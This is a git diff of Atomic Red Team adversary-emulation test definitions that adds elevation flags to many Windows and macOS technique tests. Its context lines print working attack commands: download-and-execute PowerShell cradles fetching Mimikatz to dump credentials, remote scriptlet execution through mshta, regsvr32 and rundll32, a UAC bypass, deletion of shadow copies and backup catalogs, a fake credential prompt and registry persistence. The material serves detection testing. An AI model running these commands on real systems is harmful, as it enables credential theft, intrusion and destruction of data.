a/atomics/T1085/T1085.yaml b/atomics/T1085/T1085.yaml index 7aba52cf8b..30f0b339bb 100644 --- a/atomics/T1085/T1085.yaml +++ b/atomics/T1085/T1085.yaml @@ -14,5 +14,6 @@ atomic_tests: default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct executor: name: command_prompt + elevation_required: false command: | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();" diff --git a/atomics/T1086/T1086.yaml b/atomics/T1086/T1086.yaml index 77008bcaa0..11b5379d52 100644 --- a/atomics/T1086/T1086.yaml +++ b/atomics/T1086/T1086.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" @@ -36,6 +37,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound" @@ -49,6 +51,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() @@ -63,6 +66,7 @@ atomic_tests: executor: name: powershell + elevation_required: true command: | $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr @@ -77,6 +81,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'" @@ -106,6 +111,7 @@ atomic_tests: default: Atomic Things executor: name: powershell + elevation_required: true command: | New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}' @@ -126,6 +132,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" @@ -146,6 +153,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" @@ -165,6 +173,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX" @@ -184,6 +193,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | "C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()" @@ -210,6 +220,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggJyVTeXN0ZW1Sb290JS9UZW1wL2FydC1tYXJrZXIudHh0JyAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART))) diff --git a/atomics/T1087/T1087.yaml b/atomics/T1087/T1087.yaml index 574d41aa24..bd2bfa2ff0 100644 --- a/atomics/T1087/T1087.yaml +++ b/atomics/T1087/T1087.yaml @@ -113,6 +113,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | net user net user /domain @@ -128,6 +129,7 @@ atomic_tests: - windows executor: name: powershell + elevation_required: false command: | net user net user /domain @@ -148,6 +150,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | query user @@ -158,5 +161,6 @@ atomic_tests: - windows executor: name: powershell + elevation_required: false command: | query user diff --git a/atomics/T1088/T1088.yaml b/atomics/T1088/T1088.yaml index 96f30d8c74..4e8b420b0a 100644 --- a/atomics/T1088/T1088.yaml +++ b/atomics/T1088/T1088.yaml @@ -57,6 +57,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" @@ -77,6 +78,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force diff --git a/atomics/T1096/T1096.yaml b/atomics/T1096/T1096.yaml index bc89bf3bbf..7dc47c52d2 100644 --- a/atomics/T1096/T1096.yaml +++ b/atomics/T1096/T1096.yaml @@ -22,6 +22,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index 0588686514..cb0548e7ce 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml @@ -10,6 +10,7 @@ atomic_tests: - windows executor: name: powershell + elevation_required: true command: | $x = Get-Random -Minimum 2 -Maximum 9999 $y = Get-Random -Minimum 2 -Maximum 9999 diff --git a/atomics/T1099/T1099.yaml b/atomics/T1099/T1099.yaml index 83331f0947..0f5b6aa7d7 100644 --- a/atomics/T1099/T1099.yaml +++ b/atomics/T1099/T1099.yaml @@ -101,6 +101,7 @@ atomic_tests: default: '1970-01-01 00:00:00' executor: name: command_prompt + elevation_required: false command: | powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} } @@ -123,6 +124,7 @@ atomic_tests: default: '1970-01-01 00:00:00' executor: name: command_prompt + elevation_required: false command: | powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} } @@ -145,5 +147,6 @@ atomic_tests: default: '1970-01-01 00:00:00' executor: name: command_prompt + elevation_required: false command: | powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} } diff --git a/atomics/T1101/T1101.yaml b/atomics/T1101/T1101.yaml index 24f3ce86cd..e9233f5a8b 100644 --- a/atomics/T1101/T1101.yaml +++ b/atomics/T1101/T1101.yaml @@ -15,6 +15,7 @@ atomic_tests: executor: name: powershell + elevation_required: true command: | # run these in sequence $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' diff --git a/atomics/T1103/T1103.yaml b/atomics/T1103/T1103.yaml index 72f636e79c..418436ef73 100644 --- a/atomics/T1103/T1103.yaml +++ b/atomics/T1103/T1103.yaml @@ -17,5 +17,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg.exe import #{registry_file} diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 309d30e6a8..9ca33407c8 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -186,6 +186,7 @@ atomic_tests: default: Atomic-license.txt executor: name: command_prompt + elevation_required: false command: | cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} - name: certutil download (verifyctl) @@ -204,6 +205,7 @@ atomic_tests: default: Atomic-license.txt executor: name: powershell + elevation_required: false command: | $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)" New-Item -Path $datePath -ItemType Directory diff --git a/atomics/T1107/T1107.yaml b/atomics/T1107/T1107.yaml index d0ce165ca0..f2cd48c7c9 100644 --- a/atomics/T1107/T1107.yaml +++ b/atomics/T1107/T1107.yaml @@ -62,6 +62,7 @@ atomic_tests: default: C:\Windows\Temp\victim-files-cmd\a executor: name: command_prompt + elevation_required: false command: | del /f #{file_to_delete} @@ -77,6 +78,7 @@ atomic_tests: default: C:\Windows\Temp\victim-files-cmd executor: name: command_prompt + elevation_required: false command: | del /f /S #{folder_to_delete} @@ -92,6 +94,7 @@ atomic_tests: default: C:\Windows\Temp\victim-files-ps\a executor: name: powershell + elevation_required: false command: | Remove-Item -path "#{file_to_delete}" @@ -107,6 +110,7 @@ atomic_tests: default: C:\Windows\Temp\victim-files-ps executor: name: powershell + elevation_required: false command: | Remove-Item -path "#{folder_to_delete}" -recurse @@ -117,6 +121,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | vssadmin.exe Delete Shadows /All /Quiet @@ -127,6 +132,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | wmic shadowcopy delete @@ -148,6 +154,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | wbadmin delete catalog -quiet diff --git a/atomics/T1110/T1110.yaml b/atomics/T1110/T1110.yaml index 79fb788c33..3ebd3a87ae 100644 --- a/atomics/T1110/T1110.yaml +++ b/atomics/T1110/T1110.yaml @@ -27,6 +27,7 @@ atomic_tests: default: YOUR_COMPANY executor: name: command_prompt + elevation_required: false command: | net user /domain > #{input_file_users} echo "Password1" >> #{input_file_passwords} diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 6093068275..a96b019fc7 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -10,6 +10,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f @@ -21,6 +22,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f @@ -31,6 +33,7 @@ atomic_tests: - windows executor: name: powershell + elevation_required: true command: | # here is an example of using the same method of reg load, but without the New-PSDrive cmdlet. # Here we can load all unloaded user hives and do whatever we want in the location below (comments) diff --git a/atomics/T1113/T1113.yaml b/atomics/T1113/T1113.yaml index 6f3c0007a9..604cc6e23d 100644 --- a/atomics/T1113/T1113.yaml +++ b/atomics/T1113/T1113.yaml @@ -16,6 +16,7 @@ atomic_tests: default: desktop.png executor: name: bash + elevation_required: false command: screencapture #{output_file} - name: Screencapture (silent) @@ -31,6 +32,7 @@ atomic_tests: default: desktop.png executor: name: bash + elevation_required: false command: screencapture -x #{output_file} - name: X Windows Capture diff --git a/atomics/T1114/T1114.yaml b/atomics/T1114/T1114.yaml index 01d0e4c10a..c75513695e 100644 --- a/atomics/T1114/T1114.yaml +++ b/atomics/T1114/T1114.yaml @@ -14,6 +14,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | Display email contents in the terminal PS C:\> .\Get-Inbox.ps1 diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml index 9173870300..17b7f71a18 100644 --- a/atomics/T1115/T1115.yaml +++ b/atomics/T1115/T1115.yaml @@ -11,6 +11,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | dir | clip clip < readme.txt @@ -22,6 +23,7 @@ atomic_tests: - windows executor: name: powershell + elevation_required: false command: | echo Get-Process | clip Get-Clipboard | iex diff --git a/atomics/T1117/T1117.yaml b/atomics/T1117/T1117.yaml index 923f4ad522..7e871a7ea8 100644 --- a/atomics/T1117/T1117.yaml +++ b/atomics/T1117/T1117.yaml @@ -14,6 +14,7 @@ atomic_tests: default: C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct executor: name: command_prompt + elevation_required: false command: | regsvr32.exe /s /u /i:#{filename} scrobj.dll - name: Regsvr32 remote COM scriptlet execution @@ -28,6 +29,7 @@ atomic_tests: default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct executor: name: command_prompt + elevation_required: false command: | regsvr32.exe /s /u /i:#{url} scrobj.dll - name: Regsvr32 local DLL execution @@ -42,5 +44,6 @@ atomic_tests: default: C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll executor: name: command_prompt + elevation_required: false command: | "IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )" diff --git a/atomics/T1118/T1118.yaml b/atomics/T1118/T1118.yaml index fdcafb0510..02feb78bac 100644 --- a/atomics/T1118/T1118.yaml +++ b/atomics/T1118/T1118.yaml @@ -15,6 +15,7 @@ atomic_tests: default: C:\AtomicRedTeam\atomics\T1118\src\T1118.dll executor: name: command_prompt + elevation_required: false command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\AtomicRedTeam\atomics\T1118\src\T1118.dll C:\AtomicRedTeam\atomics\T1118\src\T1118.cs C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #{filename} @@ -30,6 +31,7 @@ atomic_tests: default: C:\AtomicRedTeam\atomics\T1118\src\T1118.dll executor: name: command_prompt + elevation_required: false command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\AtomicRedTeam\atomics\T1118\src\T1118.dll C:\AtomicRedTeam\atomics\T1118\src\T1118.cs C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #{filename} diff --git a/atomics/T1119/T1119.yaml b/atomics/T1119/T1119.yaml index e084d6045b..6f00709432 100644 --- a/atomics/T1119/T1119.yaml +++ b/atomics/T1119/T1119.yaml @@ -23,5 +23,6 @@ atomic_tests: - windows executor: name: powershell + elevation_required: false command: | Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp} diff --git a/atomics/T1121/T1121.yaml b/atomics/T1121/T1121.yaml index 5a0d9c803d..ae5e734817 100644 --- a/atomics/T1121/T1121.yaml +++ b/atomics/T1121/T1121.yaml @@ -19,6 +19,7 @@ atomic_tests: default: C:\AtomicRedTeam\atomics\T1121\src\T1121.cs executor: name: command_prompt + elevation_required: false command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file} C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name} @@ -40,6 +41,7 @@ atomic_tests: default: C:\AtomicRedTeam\atomics\T1121\src\T1121.cs executor: name: powershell + elevation_required: false command: | $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' $Content = [System.Convert]::FromBase64String($key) diff --git a/atomics/T1123/T1123.yaml b/atomics/T1123/T1123.yaml index d90a15aecf..b9c753fb12 100644 --- a/atomics/T1123/T1123.yaml +++ b/atomics/T1123/T1123.yaml @@ -23,6 +23,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | SoundRecorder /FILE #{output_file} /DURATION #{duration_hms} @@ -33,5 +34,6 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet diff --git a/atomics/T1124/T1124.yaml b/atomics/T1124/T1124.yaml index e7d76c8666..6934b67dd8 100644 --- a/atomics/T1124/T1124.yaml +++ b/atomics/T1124/T1124.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | net time \\#{computer_name} w32tm /tz @@ -31,5 +32,6 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | Get-Date diff --git a/atomics/T1126/T1126.yaml b/atomics/T1126/T1126.yaml index fc10ef5b70..0ee14923d3 100644 --- a/atomics/T1126/T1126.yaml +++ b/atomics/T1126/T1126.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | net use c: #{share_name} net share test=#{share_name} /REMARK:"test share" /CACHE:No @@ -37,6 +38,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | net share #{share_name} /delete @@ -55,6 +57,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | Remove-SmbShare -Name #{share_name} Remove-FileShare -Name #{share_name} diff --git a/atomics/T1127/T1127.yaml b/atomics/T1127/T1127.yaml index 30e3f9b386..fdb111c01c 100644 --- a/atomics/T1127/T1127.yaml +++ b/atomics/T1127/T1127.yaml @@ -14,5 +14,6 @@ atomic_tests: default: T1127.csproj executor: name: command_prompt + elevation_required: false command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename} diff --git a/atomics/T1134/T1134.yaml b/atomics/T1134/T1134.yaml index cccd358e3e..9613ea2a6b 100644 --- a/atomics/T1134/T1134.yaml +++ b/atomics/T1134/T1134.yaml @@ -16,6 +16,7 @@ atomic_tests: default: SYSTEM executor: name: powershell + elevation_required: true command: | #list processes by user, diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index 3e056ec98a..a91cb1c7b5 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -36,6 +36,7 @@ atomic_tests: default: computer1 executor: name: command_prompt + elevation_required: false command: | net view \\#{computer_name} @@ -51,6 +52,7 @@ atomic_tests: default: computer1 executor: name: powershell + elevation_required: false command: | net view \\#{computer_name} get-smbshare -Name #{computer_name} diff --git a/atomics/T1136/T1136.yaml b/atomics/T1136/T1136.yaml index b6698c0bb3..8eb7fb887d 100644 --- a/atomics/T1136/T1136.yaml +++ b/atomics/T1136/T1136.yaml @@ -58,6 +58,7 @@ atomic_tests: default: Evil Account executor: name: command_prompt + elevation_required: true command: | net user /add #{username} @@ -73,6 +74,7 @@ atomic_tests: default: Evil Account executor: name: powershell + elevation_required: true command: | New-LocalUser -Name #{username} -NoPassword net user /add #{username} diff --git a/atomics/T1138/T1138.yaml b/atomics/T1138/T1138.yaml index bc343b88a7..fc4de328ca 100644 --- a/atomics/T1138/T1138.yaml +++ b/atomics/T1138/T1138.yaml @@ -20,6 +20,7 @@ atomic_tests: default: C:\AtomicRedTeam\atomics\T1138\src\AtomicShimx86.sdb executor: name: command_prompt + elevation_required: true command: | sdbinst.exe #{file_path} sdbinst.exe -u #{file_path} diff --git a/atomics/T1140/T1140.yaml b/atomics/T1140/T1140.yaml index f3e68a7eee..d1680edb61 100644 --- a/atomics/T1140/T1140.yaml +++ b/atomics/T1140/T1140.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | certutil.exe -encode #{executable} file.txt certutil.exe -decode file.txt #{executable} @@ -37,6 +38,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt diff --git a/atomics/T1141/T1141.yaml b/atomics/T1141/T1141.yaml index 2d3f6fc54b..4c4eafb38d 100644 --- a/atomics/T1141/T1141.yaml +++ b/atomics/T1141/T1141.yaml @@ -28,5 +28,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | powershell.exe -command {$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo $cred.GetNetworkCredential().Password;} \ No newline at end of file diff --git a/atomics/T1145/T1145.yaml b/atomics/T1145/T1145.yaml index be8eb158b4..9981fd1ae2 100644 --- a/atomics/T1145/T1145.yaml +++ b/atomics/T1145/T1145.yaml @@ -14,6 +14,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | echo "ATOMICREDTEAM" > %windir%\cert.key dir c:\ /b /s .key | findstr /e .key diff --git a/atomics/T1158/T1158.yaml b/atomics/T1158/T1158.yaml index edd9c4df2a..2e5ce8a658 100644 --- a/atomics/T1158/T1158.yaml +++ b/atomics/T1158/T1158.yaml @@ -60,9 +60,10 @@ atomic_tests: filename: description: path of file to mark as system type: path - default: C:\Windows\Temp\sensitive_file.txt + default: C:\Temp\sensitive_file.txt executor: name: command_prompt + elevation_required: false command: | attrib.exe +s #{filename} @@ -77,9 +78,10 @@ atomic_tests: filename: description: path of file to mark as hidden type: path - default: C:\Windows\Temp\sensitive_file.txt + default: C:\Temp\sensitive_file.txt executor: name: command_prompt + elevation_required: false command: | attrib.exe +h #{filename} @@ -175,6 +177,7 @@ atomic_tests: default: adstest.txt executor: name: command_prompt + elevation_required: false command: | echo "test" > #{file_name}:#{ads_filename} echo "test" > :#{ads_filename} @@ -196,6 +199,7 @@ atomic_tests: default: adstest.txt executor: name: powershell + elevation_required: false command: | echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" set-content -path #{file_name} -stream #{ads_filename} -value "test2" diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml index 1614bebd65..e88984fb57 100644 --- a/atomics/T1170/T1170.yaml +++ b/atomics/T1170/T1170.yaml @@ -15,6 +15,7 @@ atomic_tests: default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct executor: name: command_prompt + elevation_required: false command: | mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close(); diff --git a/atomics/T1174/T1174.yaml b/atomics/T1174/T1174.yaml index 7cb7109878..ac00cd7feb 100644 --- a/atomics/T1174/T1174.yaml +++ b/atomics/T1174/T1174.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: powershell + elevation_required: true command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" diff --git a/atomics/T1179/T1179.yaml b/atomics/T1179/T1179.yaml index b993f37d34..888649e4f7 100644 --- a/atomics/T1179/T1179.yaml +++ b/atomics/T1179/T1179.yaml @@ -19,6 +19,7 @@ atomic_tests: default: https://www.example.com executor: name: powershell + elevation_required: true command: | mavinject $pid /INJECTRUNNING #{file_name} curl #{server_name} diff --git a/atomics/T1180/T1180.yaml b/atomics/T1180/T1180.yaml index fb75d2d18a..395599b7b0 100644 --- a/atomics/T1180/T1180.yaml +++ b/atomics/T1180/T1180.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr" reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f diff --git a/atomics/T1183/T1183.yaml b/atomics/T1183/T1183.yaml index ca87b94f0d..abc25a505f 100644 --- a/atomics/T1183/T1183.yaml +++ b/atomics/T1183/T1183.yaml @@ -21,6 +21,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" @@ -43,5 +44,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}" diff --git a/atomics/T1191/T1191.yaml b/atomics/T1191/T1191.yaml index 7ee70bf51b..a3505c1576 100644 --- a/atomics/T1191/T1191.yaml +++ b/atomics/T1191/T1191.yaml @@ -17,6 +17,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | cmstp.exe /s #{inf_file_path} @@ -35,5 +36,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | cmstp.exe /s #{inf_file_uac} /au diff --git a/atomics/T1193/T1193.yaml b/atomics/T1193/T1193.yaml index 666c6cb712..dec1e631ea 100644 --- a/atomics/T1193/T1193.yaml +++ b/atomics/T1193/T1193.yaml @@ -11,6 +11,7 @@ atomic_tests: - windows executor: name: powershell + elevation_required: false command: | if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel.Application)){ return 'Please install Microsoft Excel before running this test.' diff --git a/atomics/T1196/T1196.yaml b/atomics/T1196/T1196.yaml index 2240ac28e5..01b9554efe 100644 --- a/atomics/T1196/T1196.yaml +++ b/atomics/T1196/T1196.yaml @@ -18,5 +18,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | control.exe #{cpl_file_path} diff --git a/atomics/T1201/T1201.yaml b/atomics/T1201/T1201.yaml index 72237a3a7d..141e209d32 100644 --- a/atomics/T1201/T1201.yaml +++ b/atomics/T1201/T1201.yaml @@ -62,6 +62,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | net accounts @@ -74,6 +75,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | net accounts /domain diff --git a/atomics/T1214/T1214.yaml b/atomics/T1214/T1214.yaml index 70d61d1468..6da7c37557 100644 --- a/atomics/T1214/T1214.yaml +++ b/atomics/T1214/T1214.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml index 8e0d77f404..4de8acfafe 100644 --- a/atomics/T1216/T1216.yaml +++ b/atomics/T1216/T1216.yaml @@ -18,5 +18,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index 931299315c..f97abbb086 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -21,6 +21,7 @@ atomic_tests: default: 1000 executor: name: command_prompt + elevation_required: true command: | mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} diff --git a/atomics/T1223/T1223.yaml b/atomics/T1223/T1223.yaml index 0c2b924769..cc2240bdff 100644 --- a/atomics/T1223/T1223.yaml +++ b/atomics/T1223/T1223.yaml @@ 